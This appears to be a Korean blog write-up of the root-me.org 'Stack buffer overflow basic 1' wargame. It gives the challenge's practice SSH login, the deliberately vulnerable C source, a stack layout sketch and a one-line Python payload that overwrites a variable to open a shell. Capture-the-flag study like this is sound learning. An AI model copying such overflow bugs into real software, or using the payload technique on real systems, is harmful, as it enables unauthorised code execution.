[root-me.org] ELF x86 - Stack buffer overflow basic 1 write-up
두비니
·2019. 11. 1. 22:56
::login::
| Host | challenge02.root-me.org |
| Protocol | SSH |
| Port | 2222 |
| SSH access | ssh -p 2222 app-systeme-ch13@challenge02.root-me.org |
| Username | app-systeme-ch13 |
| Password | app-systeme-ch13 |
::code::
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>
int main()
{
int var;
int check = 0x04030201;
char buf[40];
fgets(buf,45,stdin);
printf("\n[buf]: %s\n", buf);
printf("[check] %p\n", check);
if ((check != 0x04030201) && (check != 0xdeadbeef))
printf ("\nYou are on the right way!\n");
if (check == 0xdeadbeef)
{
printf("Yeah dude! You win!\nOpening your shell...\n");
setreuid(geteuid(), geteuid());
system("/bin/bash");
printf("Shell closed! Bye.\n");
}
return 0;
}보면 너무도 간단하죠
check가 0xdeadbeef이면 풀리는 문제입니다.
근데 stack구조를 생각해보면
buf[40]
check
var
ebp
ret
식으로 되어있겠죠?
buf의 값보다 큰 45바이트만큼 받는 fgets덕분에 check까지 bof를 일으킵시다.
간단히 buf를 더미값으로 채워준 다음 check를 deadbeef로 바꿔주면 되겠습니다.
(python -c 'print "A"*40+"\xef\xbe\xad\xde"';cat) | ./ch13
끝
next
'War Games > root-me.org' 카테고리의 다른 글
| [root-me.org] ELF x86 - Race condition Write-Up (0) | 2019.11.05 |
|---|---|
| [root-me.org] ELF x86 - Format string bug basic 2 Write-Up (0) | 2019.11.05 |
| [root-me.org] ELF x64 - Stack buffer overflow - basic Write-Up (0) | 2019.11.03 |
| [root-me.org] ELF x86 - Format string bug basic 1 Write-Up (0) | 2019.11.02 |
| [root-me.org] ELF x86 - Stack buffer overflow basic 2 Write-Up (0) | 2019.11.02 |
